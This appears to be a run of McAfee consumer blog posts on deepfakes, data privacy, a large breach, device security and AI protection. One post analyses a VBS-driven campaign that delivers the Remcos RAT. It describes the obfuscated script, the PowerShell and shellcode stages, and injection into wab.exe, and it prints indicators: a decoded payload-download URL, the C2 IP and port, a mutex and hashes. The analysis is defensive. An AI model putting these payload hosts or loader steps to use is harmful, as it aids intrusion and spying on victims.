Indeed, billions of people will cast their votes this year, and the rise of AI technologies begs something important from all of us — everyone must be a skeptic.
With AI tools making voice clones, video and photo deepfakes, and other forms of disinformation so easy to create, people should be on guard. Put simply, we need to run the content we see and hear through our own personal lie detectors.
A couple of things make it tough to spot a fake, as AI tools create content that appears more and more convincing.
First, our online lives operate at high speed. We’re busy, and a lot of content zips across our screens each day. If something looks or sounds just legit enough, we might assume it’s authentic without questioning it.
Second, we encounter a high volume of content that results in big emotions, making us less critical of what we see and hear. When fake content riles us up with anger or outrage, we might react, rather than follow up and learn if it’s true or not.
That’s where your personal lie detector comes in. Take a moment. Pause. And ask yourself a few questions.
What kind of questions? Common Sense Media offers several that can help you sniff out what’s likely real and what’s likely false. As you read articles, watch videos, and or receive that robocall, you can ask yourself:
Answering only a few of them can help you spot a scam or a piece of disinformation. Or at least get a sense that a scam or disinformation might be afoot. Let’s use the President Biden robocall as an example. Asking only three questions tells you a lot.
First, “Is this credible?”
In the call, the phony message from the President asks voters to “… save your vote for the November election.” Would the leader of the world’s largest democracy truly ask you not to vote in an election? Not to exercise a basic right? No. That unlikelihood marks a strong indication of a fake.
Second, “Who might benefit from or be harmed by this message?”
This question takes a little more digging to answer. Because the Democratic party shifted its first Presidential primary election from New Hampshire to South Carolina this year, local supporters have launched a grassroots effort. Its intent is to encourage voters to write in Joe Biden on their Tuesday ballot to show support for their favored candidate. The disinformation contained in the AI clone robocall could undermine such efforts, marking yet another strong indication of a fake.
Lastly, “what important info is left out of the message?
How does “saving your vote” for another election help a candidate? The message fails to explain why. That’s because it doesn’t help. You have a vote in every election. There’s no saving your vote. This further raises a major red flag.
While these questions didn’t give definitive answers, they certainly call plenty of components of the audio into question. Everything about this robocall sounds like a piece of disinformation, once you ask yourself a few quick questions and run the answers through your own internal lie detector.
With the political stakes so particularly high this year, expect to see more of these disinformation campaigns worldwide. We predict that more bad actors will use AI tools to make candidates say things they never said, give people incorrect polling info, and generate articles that mislead people on any number of topics and issues.
Expect to use your lie detector. By slowing down and asking some of those “Common Sense” questions, you can uncover plenty.
Also, take comfort in knowing that we’re developing technologies that detect AI fakes, like our Project Mockingbird for AI-generated audio. Moreover, we’re working on technologies for image detection, video detection, and text detection as well. We want to make spotting a fake far easier than it is, something you can do in seconds. Like having an AI lie detector in your back pocket.
Between those technologies and your own common sense, you’ll have powerful tools to know what’s real and what’s fake out there.
[ii] https://www.doj.nh.gov/news/2024/20240122-voter-robocall.html
The post Was the Fake Joe Biden Robocall Created with AI? appeared first on McAfee Blog.
Imagine a “Privacy Facts” label on the apps, devices, and websites you use. Like a digital version of the “Nutrition Facts” on the sides of your cereal boxes and other food you buy. With a quick look, you could see what the company behind that app, device, or website collects — and what they do with it.
Sadly, no such label exists. The fact of privacy today is that it takes work to uncover how the apps, devices, and websites you use collect your personal data and info.
To uncover those details, you’ll find yourself wading through privacy policies, which are known for their thick legalese. And they can get rather vague. Words like “may” and “might” leave the door open for what companies really do with the personal info and data they collect. They “may” share it with other parties and they “might” sell it to other parties as well.
Meanwhile, those other parties “may” or “might” use it for their own purposes. Other parties that are largely unknown to you, if not completely unknown, because they’re undisclosed.
As a result, once your personal data and info gets out there, it has a way of getting around.
Data and info collection powers the internet, which counts as yet one more fact of privacy. Yet that collection has its legal and ethical boundaries. And those boundaries stand front and center once again this Data Privacy Day.
Data Privacy Day gives us a chance to consider the importance of respecting privacy, of protecting data, and of building trust. Particularly on the internet, where data is the coin of the realm. It holds great value. Companies want it to improve their services and marketing. Bad actors want it to commit fraud and theft — or sell it on dark marketplaces.
Your clutch of personal data and info has a price tag hanging on it. That makes it worth protecting.
Granted, we think about privacy every day. The value it has. The importance of protecting it. And how we can make that protection it stronger and easier for you. That’s very much on our minds in a time where people say they have little idea about what personal data and info gets collected.
Indeed, plenty of people are scratching their heads about their privacy online. Findings from Pew Research in 2023 showed that roughly three-quarters of Americans surveyed said they feel like they have little or no control over data collectioni. Moreover, 67% of them said they understand little to nothing about what companies are doing with their personal data. That’s up 8% from 59% in 2019ii.
In four short years, more people feel like protecting their privacy is out of their hands. Even the ripple effects of the European Union’s General Data Protection Regulation (GDPR)iii and strong consumer privacy laws in a dozen or so U.S. statesiv haven’t increased their confidence. Only 61% of Americans feel that anything they do will make much difference when it comes to managing their privacy onlinev.
Yet something else has happened in those four years. Online protection software has become more powerful. Particularly when it comes to privacy. Even if things feel otherwise, you truly can take significant steps that make a difference in your privacy.
As far as our online protection software goes, it offers several simple and powerful ways to protect your privacy. McAfee+ features Personal Data Cleanup and Online Account Cleanup — two ways you can take control of your data and info. With them, you can:
Further, McAfee+ rounds things out with our VPN. That keeps you anonymous from advertisers and other data collectors, all while securing you from other prying eyes online.
Those handful of features, part of your overall identity and virus protection, can make you far more private. Even in a time of opaque privacy policies and heavy data collection online. Once again, our aim is to make that simple and powerful for you.
It really is too bad there’s not a label for privacy. Sure, it’d be nice if you could peer into the Privacy Facts of the apps, devices, and websites you use. But the good news is that online protection software can put you in control of your personal data and info without those details. You truly are in more charge of your privacy than you might feel nowadays.
[ii] https://www.pewresearch.org/internet/2023/10/18/how-americans-view-data-privacy/
[iii] https://gdpr.eu/what-is-gdpr/
[iv] https://pro.bloomberglaw.com/brief/state-privacy-legislation-tracker/
The post Protect What Matters on Data Privacy Day appeared first on McAfee Blog.
Security researchers have discovered a massive data breach containing more than 26 billion records — a hacker’s trove of records compiled from LinkedIn, Twitter, Adobe, and thousands of other organizations. Likely the largest of its kind, researchers have dubbed it MOAB or the “Mother of All Breaches.”
With billions of pieces of personal info compromised, you can count on one thing here for sure. Bad actors out there will surely take advantage of this windfall. We’ll share the immediate steps you can take to stay safe.
Just to get a sense of the breach’s scope, the newly discovered database contains over 3,800 folders, each containing records from an individual data breach. As such, it seems that these breached records were compiled over time to create this database.
Within that list of 3,800 folders, it includes major brands and entities such as Twitter/X (281 million records), LinkedIn (251 million records), Evite (179 million records), and Adobe (153 million records). Leading the way with breached records is Tencent, with 1.5 billion records exposed.
Researchers also discovered that the leak contains records from government organizations in the US, Brazil, Germany, Philippines, Turkey, and other countries.
To date, no group has stepped forward to claim responsibility for this massive compilation of breached info. Researchers speculate that it could be a “malicious actor, data broker, or some service that works with large amounts of data.”
Given the scale of the breach, your best bet is to act like your data was caught up in it.
This breach truly is a treasure trove for hackers and scammers. With the info contained in it, they can launch follow-on attacks. Like identity theft, phishing attempts, and password-stuffing attacks often follow in the wake of breaches. And indeed, this is a massive breach.
We can’t stress enough that acting now is super important.
Immediate steps include:
Changing passwords now is a must. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager will help you keep on top of it all, while also storing your passwords securely. Moreover, changing your passwords regularly might make a stolen password worthless because it’s out of date.
While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts will help your cause by providing an added layer of security. It’s increasingly common to see nowadays, where banks and all manner of online services will only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. If your accounts support two-factor authentication, enable it.
An identity monitoring service can monitor everything from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft. Personal info harvested from data breaches can end up on dark web marketplaces where other bad actors buy it for their own attacks. Ours monitors the dark web for your personal info and provides early notifications if your data is found on there, an average of 10 months ahead of similar services. We also provide guidance to help you act if your info is found.
When personal info gets released, there’s a chance that a hacker, scammer, or thief will put it to use. This might include committing fraud, where they draw funds from existing accounts, and theft, where they create new accounts in a victim’s name.
With that, strongly consider taking preventive measures now. Checking your credit, putting a security freeze in place, and getting theft protection can help keep you safe in the wake of a breach. You can get all three in place with our McAfee+ Advanced or Ultimate plans. Features include:
Credit monitoring keeps an eye on changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
Security freeze protects you proactively by stopping unauthorized access to existing credit card, bank, and utility accounts or from new ones being opened in your name. And it won’t affect your credit score.
ID Theft & Restoration Coverage gives you $2 million in identity theft coverage and identity restoration support if determined you’re a victim of identity theft. This way, you can cover losses and repair your credit and identity with a licensed recovery expert.
A complete suite of online protection software can offer layers of extra security. In addition to password management and identity theft protection, it includes AI-powered scam detection that can spot scam texts, emails, and links on social media that otherwise look legit. If you accidentally tap or click on a sketchy link? Don’t worry, it can block those links from taking you to risky sites too. In all, online protection software offers you a broad range of defenses and preventative measures any time data breaches occur. Even breaches the size of the MOAB breach.
The post 26 Billion Records Released in “The mother of all breaches” appeared first on McAfee Blog.
Authored by Preksha Saxena and Yashvi Shah
McAfee Labs has been tracking a sophisticated VBS campaign characterized by obfuscated Visual Basic Scripting (VBS). Initially delivering the AgentTesla malware, the campaign has evolved into a multi-faceted threat, employing VBS scripts as a versatile delivery mechanism. Notably, this campaign extends beyond AgentTesla, now distributing a range of malware such as Guloader, Remcos RAT, Xworm, and Lokibot.
This campaign illustrates a comprehensive infection process initiated by a VBS file delivered via email. Starting with the activation of a VBS script, it progresses through PowerShell phases, utilizing the BitsTransfer utility for fetching a second-stage PowerShell script. The decoded and executed Shellcode A conceals and loads Shellcode B. In the final phase, wab.exe downloads the encrypted Remcos RAT payload. Shellcode B decrypts and injects it into wab.exe, making it function as the Remcos RAT.
The observed campaign has been noted for targeting diverse regions worldwide. Presented below is a geographical heatmap depicting McAfee customers who have been targeted and saved over the past three months.
Figure 1: Geo Heatmap showing targeted regions.
In the featured blog post, malicious actors utilized GuLoader to deploy the Remcos RAT.
Figure 2: Infection chain
The execution begins by running a VBS script. then it triggers the execution of the first-stage PowerShell. Subsequently, the BitsTransfer utility is employed to fetch a second-stage PowerShell which is base64 encoded.
The second stage PowerShell is then encoded and executed. Following this, the First Shellcode is meticulously carved out and loaded reflectively. The second Shellcode encoded within Shellcode A, undergoes decoding and is also reflectively loaded.
The final step involves a second Shellcode which is leveraged to retrieve and inject the Remcos RAT (Remote Control and Surveillance Tool) into a legitimate Windows process. In this case, wab.exe. This intricate series of actions allows for the stealthy deployment and operation of the Remcos RAT within the Windows environment.
Figure 3: Process Tree
Attached to the email is a ZIP file seemingly labeled as “revised_quotation_for_purchase_invoice_order_design_6th_november_2023“, resembling an invoice to the user. The intent, much like similar deceptive emails, is for the recipient not to scrutinize the email closely.
Inside the zip file attachment is a heavily obfuscated VBS file. The VBS script employed several techniques to make the analysis quite difficult. It has many garbage variables, decoy functions, and unnecessary comments, and all the malicious functions are obfuscated.
Figure 4: Heavily obfuscated script
The code appears streamlined after removing redundant lines, resulting in a more concise and efficient version. After removing all the comments, the script turned out to be as follows:
Figure 5: Post-removing the junk code
In the script, there’s a frequent appending of new strings to the variable “Fu6”. This method serves to increase the complexity of the analysis. Once all the strings are concatenated and formatted, the result emerges in a more intriguing manner. As shown in the below image.
Figure 6: After deobfuscating the code
The function “Mikr9” will handle the conversion of strings, rendering them readable. We converted all the lines to a readable format, with the help of the “Fu6” function. For example, as shown in Figure 5, the string
‘DelfhAdvetFagstStatpYapp:Nona/fisk/Indh1 Sic0 Tra3parc. Mon1Gens7Vide6Eufo.Tast1Outs1Midd1afte.Dors1husg6 Hal3Beja/ Hypm RenuColonSprgdNasahToasuRafflchon.GyttpBrnefMuckbAcci ‘ became http://103.176.111[.]163/mundhul.pfb.
Likewise, the entire script is decoded, and we get the following script:
Figure 7: After applying decrypting function Mikr9()
The script conducts the following sequence of activities:
The file retrieved shows zero detection on VT, appears to be base64 encoded, and has a size of 336KB.
Figure 8: Second Powershell script
Figure 9: Content is base64 encoded
Upon decoding “mundhul.pfb,” a detailed analysis can be conducted to comprehend its functionality, enabling further examination of the malware’s execution. Once the file gets decoded, it reveals a code resembling the image provided below.
Figure 10: Base64 decoded data
As specified in the script, execute a jump to offset 229981 and retrieve the ensuing 28050 units of data. This marks the start of the second PowerShell script, which is 28050 bytes, marked as follows.
Figure 11: Start of encrypted second PowerShell
The code contains various comments, so we followed the same procedure, as we did for the first script, removed all the junk code and we got a function that seems to handle the decryption of all the strings.
</centerFigure 12: After removing the junk
The decryption process iterates multiple times to unveil the strings, and the malware employs the “Invoke” method to execute its commands. After decoding all the strings using “Bedroges02” function, we finally got the intent of the script.
Figure 13: After applying decryption logic
The PowerShell script initially loads the VirtualAlloc() function and stores the memory handle in variables named “trll3” and “Akuammin195”. These sections possess permissions for writing, reading, and executing. The latter segment of the script appears to invoke a concealed shellcode embedded within it.
The execution sequence involves copying the bytes as follows: The initial 644 bytes from the beginning of this PowerShell script constitute the first shellcode. Subsequently, starting from byte 644, the script copies the next 229337 bytes, constituting the second shellcode.
Figure 14: Constituting shellcode
Following the execution sequence, malware initiates the API call CallWindowProcA, leading subsequently to the invocation of the native function NtProtectVirtualMemory. Then the process transitions directly to initiating the first shellcode.
The shellcode-A’s primary action involves copying the shellcode B into memory, as depicted in the figure below.
Figure 15: Loop used for copying shellcode B
The shellcode B undergoes decryption via XOR operation. This operation serves to transform the code into its executable form, allowing the decrypted shellcode to execute its intended instructions within the system’s memory.
Figure 16: Decryption loop used for decrypting shellcode B
The shellcode is designed to establish a new process named “wab.exe” and it replicates 0x3FC4000 bytes of decrypted shellcode into its memory space. As indicated by the highlighted blue box, the content decrypted from the second shellcode (shown in Figure 15) is subsequently injected into the wab.exe process (depicted in Figure 16).
Figure 17: Injection of second shellcode
The objective of the shellcode is to fetch the Remcos RAT from the specified URL, “hxxp://103.176.111.163/lnHxQotdQb132.bin” and subsequently inject it into the “wab.exe” process. Once “wab.exe” is injected by the final payload, it undertakes all malicious activities.
Figure 18: wab.exe connecting to C2
The file obtained from the provided URL seems to be an encrypted binary. Upon decryption, it has been recognized to initiate communication with the IP address 94.156.65.197 through port 2404. An observation revealed the creation of a mutex named “Rmc-R7V4VM.” Data keylogged during its operation is stored in a file labeled “logs.dat.” Additionally, screenshots captured are saved in a directory named “Screenshots,” while the overall repository for the collected data is titled “Remcos.”
Conclusion:
This campaign outlines the comprehensive infection process initiated by a VBS file received through email. The process begins with the activation of a VBS script, initiating the initial PowerShell phase. Subsequently, the BitsTransfer utility is used to fetch a second-stage PowerShell script, encoded in base64. After decoding and execution, the first Shellcode is carefully extracted and loaded reflectively. Simultaneously, Shellcode A conceals and loads the decoded Shellcode B.
In the final phase, the injected wab.exe proceeds to download the encrypted final payload of the Remcos RAT. Shellcode B is responsible for decrypting the payload, and it is subsequently injected into wab.exe. Consequently, this particular instance of wab.exe functions as the Remcos RAT.
VBScript in the Windows Environment: A Security Perspective
VBScript, introduced by Microsoft in 1996, was crucial in the Windows environment as a scripting language for task automation, tightly integrated with Internet Explorer, and a key component of technologies like Windows Script Host, Active Server Pages, and Office automation. It provided a simple scripting solution for system tasks, web development, and server-side logic. Microsoft is deprecating VBScript, and it will be available as a feature on-demand before eventual removal from Windows, said the company. This decision aligns with a broader strategy to reduce malware campaigns exploiting Windows and Office features. VBScript, disabled by default in Internet Explorer 11 since 2019, has been used by malicious actors for distributing malware, and Microsoft aims to enhance security by eliminating this infection vector. Attackers exploit vulnerabilities in phased-out technologies due to lingering use in legacy systems, slow adoption of updates, custom applications, stringent industry requirements, and user resistance to change. To mitigate risks, proactive measures such as prompt updates, security education, and staying informed about software lifecycles are crucial.
Mitigation:
Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:
| VBS file | 6fdd246520eebb59e37a7cd544477567b405a11e118b7754ff0d4a89c01251e4 |
| Second PowerShell | 5d21216a92ffea5b8ba70f48f9bcbb8a530a9b272423ae3ba519dbf74a905a65 |
| Final payload | 7d947df412e78a595029121ecaf9d8a88e69175cffd1f2d75d31e3ca8995c978 |
| URL1 | hxxp://103.176.111[.]163/mundhul.pfb |
| URL2 | hxxp://103.176.111[.]163/lnHxQotdQb132.bin |
| IP address | 103.176.111[.]163 |
| IP address | 94.156.65[.]197 |
| Mutex | Rmc-R7V4VM |
The post From Email to RAT: Deciphering a VB Script-Driven Campaign appeared first on McAfee Blog.
Taylor Swift wants plenty of good things for her fans — but a free Dutch oven isn’t one of them.
A new scam has cropped up on social media, where an AI deepfake of Swift targets her loyal Swifties with the lure of free Le Creuset products. Yet no one winds up with a piece of the singer’s much-beloved cookware. Instead, they end up with a case of identity fraud. This latest scam follows a string of celebrity deepfakes on YouTube and scams also targeting Kelly Clarkson.
The story has made its share of headlines. Unsurprisingly so, given the singer’s high profile. Scammers have cooked up a synthetic version of Swift’s voice, using AI voice cloning technology we’ve highlighted in our blogs before.
With a script for the voice clone and real snippets of video of the star, the scammers (not Swift) encourage fans to jump on the free offer. All it takes is a $9.96 shipping fee. Paid for by credit or debit card. Once in the hands of the scammers, the cards get charged, and sometimes charged repeatedly. In all, it’s a classic case of identity fraud — this time with an AI voice clone twist.
Image of footage from the Taylor Swift social media scam.
Le Creuset quickly pointed out that no such promotion exists and that any certified Le Creuset promotions get posted on their official social channels. So, to put a fine point on it, Tay-Tay will not send you a Le Creuset.
Swift unfortunately finds herself in plenty of company. As we’ve reported previously, 2023 saw numerous celebrity AI cloning scams that hawked bogus goods, crooked investment scams, and phony cryptocurrency deals. Our 2024 predictions blog called for much more of the same this year, and the Taylor Swift scam has kicked things off in a high-profile way.
If people haven’t heard about AI cloning scams already, there’s a good chance that they do now.
So, what are we to do about it? How are we to tell what’s real and what’s fake online? Our Project Mockingbird points to the answer.
We just unveiled Project Mockingbird at the CES tech show in Las Vegas, a new technology that helps detect AI-generated audio in deepfakes. Think of it as a lie detector that spots fake news and other schemes.
See for yourself. We ran video of the Taylor Swift cookware scam through our Project Mockingbird technology. You’ll see red lines spike as it detects cloned audio, which shows you to what degree the audio is real or fake, all along a charted timeline.
In addition to spotting celebrity scams, this approach to AI clone detection combats another particularly popular form of deepfake. The AI wrapper scam, where scammers wrap their cloned speech inside an otherwise legitimate video. Check out the example below. Here, scammers used clips of real news presenters to dress up their ChatGPT investment scam video.
Note how the detector registered at the baseline when the news presenters spoke, which indicates authentic audio. Then note how it spiked when the cloned audio kicked in — the part of the video that pitched the ChatGPT investment scam.
Project Mockingbird marks the first public demonstration of our new AI-detection technologies. In addition to AI audio detection, we’re working on technology for image detection, video detection, and text detection as well.
With these capabilities, we’ll put the power of knowing what is real or fake directly into your hands. Another way you can think about it is that McAfee is like having a lie detector in your back pocket. With it, you’ll know what’s real and what’s fake online. Something we’ll all need more and more as AI technologies mature.
Looking ahead, we’ll see more than celebrity scams. We’ll see AI voice clones used to trick family members into sending money as part of phony emergency message scams. We’ll see it used for cyberbullying. And we’ll see bad actors use it to twist political speech across 2024’s major election cycles worldwide.
Through it all, we aim to give you the power of trust — to trust what you see and hear online. To know what’s real and what’s fake out there. Project Mockingbird represents our first public step toward that goal.
The post No, Taylor Swift Won’t Send You a Free Dutch Oven — The New AI Cloning Scam appeared first on McAfee Blog.
New year, new tech. That’s what hits the floor at the CES show each January in Las Vegas. Whether it’s striking, strange, or just pretty cool, plenty of this year’s tech is connected — and that means it needs to get protected.
Already we’ve seen a personal health scanner that works like a tricorder from Star Trek, smart belts that help people with limited vision get around safely, and smart locks that open your door with the palm of your hand.
Coursing through all these connected devices are data and info — data and info about you. Your family. Your home. Your comings and goings. The kind of data and info that all kinds of people want to get their hands on.
That’s where protection comes in.
Any device connected to the internet must be protected. Even if it’s something as innocuous as a smart wall outlet. The reason is, your home network is only as strong as its weakest security link. And many smart devices don’t come with the best security out of the box. Hackers know this. By compromising a device like a smart wall outlet, a hacker can gain access to the rest of the network and the devices and data on it.
But how do you protect a smart wall outlet, along with that smart coffeemaker, door lock, and refrigerator? We’ll run it down for you, plus advice for keeping the latest in medical, fitness, and mobile devices safe as well.
Broadly speaking, you can protect most of your tech with a handful of steps. Whether it’s a new Wi-Fi router, smartwatch, or even a connected fridge, they can all benefit from the following basics.
Use strong, unique passwords.
When it’s time to set up a new account or device, go with a strong, unique password. Strong means a mix of at least 12 characters, if not more. That includes a mix of numbers, symbols, and both letter cases, upper and lower. Unique means you don’t repeat it across accounts. That way, if one password gets compromised, the rest will remain secure.
Why strong and unique? Given today’s computing power, a hacker’s password generator can create millions of passwords in seconds. Weak passwords have no chance against them. It’s a simple matter of statistics.
Consider a password that uses eight numbers, uppercase and lowercase letters, and symbols. Sounds pretty strong, right? Unfortunately, a brute-force attack might crack that password in as fast as one second. One second …
|
Password Length
(Using numbers, uppercase and lowercase letters, and symbols) |
Time to Crack |
| 8 | One Second |
| 12 | Eight Months |
| 16 | 16 Million Years |
However, increase that password length to twelve numbers, uppercase and lowercase letters, and symbols — it’d that eight months to crack that password. Bump it up to 16, and it would take 16 million years. The longer it is, the more complex it is. And thus tougher to crack. It’s the difference between one second and 16 million years. And if a hacker’s brute-force attack on one password takes too long, it’ll simply move onto the next one.
A password manager can help create strong, unique passwords for you. Also found in comprehensive online protection software, a password manager can create and securely store strong and unique passwords for your mom and dad, giving them one less thing they need to remember and worry about.
Use multi-factor authentication
Online banks, shops, and other services commonly offer multi-factor authentication to help protect your accounts — with the typical combination of your username, password, and a security code sent to another device you own (often a mobile phone).
If your device or account supports multi-factor authentication, consider using it there too. It throws a big barrier in the way of hackers who try and force their way into your device with a password/username combination.
Keep everything updated
Update your apps and devices regularly. In addition to fixing the odd bug or adding the occasional new feature, app and device updates often address security gaps. Out-of-date apps and devices might have flaws that hackers can exploit, so regular updating is a must from a security standpoint. If you can set your apps and devices to receive automatic updates, even better.
Keep in mind that this very much applies to smart home devices as well.
Secure your internet router
Another device that needs good password protection is your internet router. Make sure you use a strong and unique password there as well to help prevent hackers from breaking into your home network.
Also consider changing the name of your home network so that it doesn’t personally identify you. Fun alternatives to using your name or address include everything from movie lines like “May the Wi-Fi be with you” to old sitcom references like “Central Perk.” Also check that your router is using an encryption method, like WPA2 or the newer WPA3, which will keep your signal secure.
Protect (your) everything
Comprehensive online protection software can secure your phones, tablets, and computers. Moreover, it can protect your privacy, identity, and spot scam texts, messages, and links — just to name a few of the many things it can do.
Moreover, these devices often connect to other devices on your home network. In a way, they act as a remote control for smart home devices like thermostats, alarms, and door locks. Protecting phones, tablets, and computers thus protect those other devices by extension.
The smarts behind a smart home come from you. At least when it comes to keeping it more private and secure. The thing with smart home devices is this, they’re connected. And anything that gets connected gets protected. That can look a little different for these devices than it does for your computers and phones, yet there are steps you can take.
Reset the factory password
Many smart home and internet of things (IOT) devices come with preset usernames and passwords from the factory. So much so, that you can easily find lists of stock usernames and passwords for these devices posted online where hackers can get a hold of them.
In the past, we’ve seen all kinds of attacks occur when these credentials don’t get changed. Among them are stories of hacked baby monitors where attackers take control of the camera and speakers. So just as you do for your other devices and accounts, create a fresh username and pair it with a strong, unique password as outlined above.
Upgrade to a newer internet router
Likewise, older routers might have outdated security measures, which might make them more prone to attacks. If you’re renting yours from your internet provider, contact them for an upgrade. If you’re using your own, visit a reputable news or review site such as Consumer Reports for a list of the best routers that combine speed, capacity, and security.
Set up a guest network specifically for your IoT devices
Just as you can offer your guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices on your primary network, the one where you connect your computers and smartphones.
One more note — research the manufacturer
One of the strongest security measures you can take is research. Before purchasing, look up the manufacturer. Have they had security issues with their devices in the past? Are their devices well-reviewed? How about their privacy policy? What are they doing with your data?
It can get a little tricky tracking down that kind of info, yet you have a couple of great places to start. One is Consumer Reports and their thorough reviews of devices and tech. Another resource is Mozilla Foundation’s “Privacy Not Included” site, which reviews connected products like smart home and IoT devices for safety and security.
For a quick check-in, a prescription consultation, or just a conversation with a healthcare pro, telemedicine has firmly established itself as a viable option for many types of care. Of course, the info discussed and shared in such a visit can be sensitive.
Use a VPN
A VPN, or virtual private network, offers a strong layer of additional protection when you’re transmitting health data or having a private conversation about your health with a professional. A VPN creates an encrypted tunnel to keep you and your activity anonymous. In effect, your data is scrambled and hidden to anyone outside your VPN tunnel, thus making your private info difficult to collect. Check with the care provider to see if their telemedicine solution uses a VPN. If not, you can always get a VPN as part of your online protection software.
Check in with your provider
If you’re considering a virtual doctor visit, now’s a great chance to check in with your care provider before your appointment. This way, you can get comfortable with what your visit will look like, find out what special apps (if any) are used, and how your care provider will protect your privacy. Also, you can decide which device you’ll use and where you’ll use it so that you feel at ease during your virtual visit.
A reputable care provider will likely put all this pre-appointment info together for you on their website or “frequently asked questions” (FAQ) page, which will include helpful links and numbers to call if you need help or have questions. For an example of what that might look like, check out the telemedicine page that Virginia Mason/Franciscan Health designed for its patients.
Pick a private place
We’ve talked plenty about digital security, yet there’s the old-fashioned issue of physical eavesdropping to think about too. When it’s time for your actual appointment, pick a place in your home where you can ensure yourself some privacy. (Of course, don’t go online for your virtual appointment in a public place.) Look for a space where you can’t be overheard by neighbors and passers-by — preferably someplace like your bedroom where you can be comfortable as well.
By design, many wearables are big on data collection. Coursing through them are all kinds of data, about your vital signs, sleep patterns, not to mention your whereabouts — like when and where you like to run on your hill training days. Keeping these devices secure means keeping some of your most personal info secure as well.
As always, research the manufacturer
Very similar to what we mentioned about smart home and IoT devices, check the manufacturer’s track record. Read reviews. Hit up trusted sources. In all, find out how private and secure your device is. The same resources listed above can help you make an informed purchase.
When it comes to privacy, not all privacy policies are equal. The same goes for their privacy policies. Reading the privacy policy will tell you what kind of data the device collects. Further, it will show if and how it’s shared with the manufacturer and if they sell or share it with others. Likewise, you can factor what you find into your purchasing decision.
Adjust the privacy settings
This will vary from device to device as well, yet one more way you can lock down your privacy is in the device settings. Look for options around location tracking, social media sharing, and what types of data are shared online in addition to the device. Overall, consider what kind of fitness data it gathers and where it goes. If you’re not comfortable with that data ending up in the hands of a stranger, make it private.
When upgrading to a new device, wipe your old one.
Along the same lines, that old wearable of yours might be chock full of data. Before passing it along, selling it, or recycling it, wipe it. Remove all the old data by restoring it to factory settings (your manufacturer can show you how).
Also, delete any old online account associated with it if you have no more use for it. See to it that any data with that account gets deleted as well, which leaves you with one less account that could wind up the target of a data breach. A service like our own McAfee Online Account Cleanup can help, which you can find in our McAfee+ plans.
Certainly, if there’s one device that works like the remote control for our lives, it’s our smartphone. Smartphones and mobile devices like them need protection too — in their own right, and because they connect to so much more.
Avoid third-party app stores
Google Play and Apple’s App Store have measures in place to review and vet apps to help ensure that they are safe and secure. Third-party sites might very well not, and they might intentionally host malicious apps as part of a front. Further, Google and Apple are quick to remove malicious apps from their stores when discovered, making shopping there safer still.
Review apps carefully
Check out the developer — have they published several other apps with many downloads and good reviews? A legit app typically has quite a few reviews, whereas malicious apps might have only a handful of (phony) five-star reviews. Lastly, look for typos and poor grammar in both the app description and screenshots. They could be a sign that a hacker slapped the app together and quickly deployed it.
Yet better than combing through user reviews yourself is getting a recommendation from a trusted source, like a well-known publication or from app store editors themselves. In this case, much of the vetting work has been done for you by an established reviewer. A quick online search like “best fitness apps” or “best apps for travelers” should turn up articles from legitimate sites that can suggest good options and describe them in detail before you download.
Keep an eye on app permissions
Another way hackers weasel their way into your device is by getting permissions to access things like your location, contacts, and photos — and they’ll use malicious apps to do it. If an app asks for way more than you bargained for, like a simple puzzle game that asks for access to your camera or microphone, it might be a scam. Delete the app.
Lock your phone — and keep an eye on it too
Some bad actors will try to install spyware on phones themselves. However, this requires access, time, and effort to pull off. Locking your phone and always keeping it close can help prevent bad actors from infecting your phone this way.
Another step you can take is to familiarize yourself with the remote locking and wiping features of your mobile device. Many manufacturers offer this feature on mobile devices. Strongly consider using it in the event of loss or theft.
The post New Year, New Tech at CES — The Latest Protection for the Latest Tech appeared first on McAfee Blog.
We’ve seen how AI can create — and how it can transform our lives. What gets talked about less is how AI protects us too.
Certainly, it’s tough to miss how generative AI has turned sci-fi dreams of the past into today’s reality. From AI apps that help ease loneliness thanks to their human-like conversations, to technology that can predict and manage health risks, to browsers that whip up pieces of art with a prompt, it’s changing the way we go about our day and the way we live our lives.
However, we find ourselves only in generative AI’s earliest days. Countless more applications await over the near and distant horizon alike.
Yet that’s the important thing to remember with AI. It’s an application. A tool. And like any other tool, it’s neutral. Whether it helps or harms comes down to the person using it.
Thus, on the flip side of AI, we’ve seen all manner of shady and damaging applications. Hackers use AI to code new forms of malware at record rates. Scammers spin up convincing-looking phishing attacks and sites that harvest personal info, also at record rates. And we’ve further seen bad actors use so-called “deepfake” technologies to clone the voices and likenesses of public figures, whether for profit or to spread disinformation.
So, amid the excitement about AI, there runs a thread of uncertainty. Recently, we found that 52% of Americans are more concerned than excited about AI in daily life. Only 10% of people said they’re more excited than concerned. Meanwhile, 36% feel a mix of excitement and concern.
Uncertainty prevails, for sure. Yet something often gets overlooked in the conversation about AI: it can offer powerful protections against all manner of threats. Moreover, AI offers particularly potent protections against AI threats.
In this way, AI is your ally. At McAfee, we’ve used it to protect you for nearly a decade now. In fact, AI applications have been around for some time, long before they made headlines like they do now. And we continue to evolve AI technologies to help keep you safe. In the age of AI, McAfee is your ally. Our aim is to give you certainty and safety in rapidly changing times.
Ultimately, here’s what’s at stake today: people want to know what they can trust, and AI has made that tricky. What’s real? What’s fake? It’s getting tougher and tougher to tell.
The future of AI and online safety lies in pairing progress with protection. Here at McAfee, we see this as our role. We’re evolving AI in ways that give people the power to protect their privacy, identity, and devices even better than before. Now, that protection extends yet further. It also gives them the power to know what they can trust whenever they go online.
The time couldn’t be more right for that. Uncertainty about AI prevails. In all, more than half of Americans we talked to said they’re concerned that the arrival of AI has made online scams more accurate and believable.
Our threat detection figures put their concerns into focus:
With that, we ask ourselves, what can AI do for you? How can it keep you safe? Three principles provide the answer:
These principles drive our thinking in significant ways as we pair progress with protection in the age of AI. They stand as our commitment to keeping you safe and certain online, through our existing technologies and entirely new technologies alike.
As we’ve used AI as a core component of our protection for years now, it’s done plenty for you over that time. Our AI has sniffed out viruses, malicious websites, and sketchy content online. It’s helped steer you clear of malicious websites too.
So, the AI you have in your McAfee antivirus, it works like this:
